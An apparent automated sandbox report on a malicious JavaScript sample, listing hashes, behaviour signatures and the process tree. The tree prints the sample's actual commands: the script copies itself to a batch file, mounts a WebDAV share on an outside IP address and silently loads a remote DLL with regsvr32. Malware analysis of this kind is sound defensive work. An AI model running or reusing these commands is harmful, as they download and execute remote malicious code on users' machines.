Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 13:49
Static task
static1
Behavioral task
behavioral1
Sample
164962732970732594.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
164962732970732594.js
Resource
win10v2004-20240709-en
General
-
Target
164962732970732594.js
-
Size
5KB
-
MD5
a6b2a59f6d83b8cc55113b7373909b77
-
SHA1
1dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
-
SHA256
90b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
-
SHA512
74279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0
-
SSDEEP
96:Bs9Kmsh6bskUzzFPiv+FRTQszC+FRTOIgisUj12uiDKIvXoEPkuEq:1Gfisu2bB/okkuz
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2720 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2692 wrote to memory of 3068 2692 wscript.exe 30 PID 2692 wrote to memory of 3068 2692 wscript.exe 30 PID 2692 wrote to memory of 3068 2692 wscript.exe 30 PID 3068 wrote to memory of 2844 3068 cmd.exe 32 PID 3068 wrote to memory of 2844 3068 cmd.exe 32 PID 3068 wrote to memory of 2844 3068 cmd.exe 32 PID 3068 wrote to memory of 2720 3068 cmd.exe 33 PID 3068 wrote to memory of 2720 3068 cmd.exe 33 PID 3068 wrote to memory of 2720 3068 cmd.exe 33 PID 3068 wrote to memory of 2720 3068 cmd.exe 33 PID 3068 wrote to memory of 2720 3068 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\164962732970732594.js1⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\164962732970732594.js" "C:\Users\Admin\\vmmoin.bat" && "C:\Users\Admin\\vmmoin.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2844
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\115.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2720
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a6b2a59f6d83b8cc55113b7373909b77
SHA11dc6f69b3a2088a101d6bee2f4a2af8de2de1c04
SHA25690b640d05694d5b6443dd4b5ac15467cdd1770e26d3a396cc3f7eedf8815395c
SHA51274279ce9b4c82ab5d5c8fd9a0d9cad7ca2d40f27e226791946f6d477bfe6de445bbb69bf285a9479b740c4da6293b323083796a97b068f17fa5941fab27ff8d0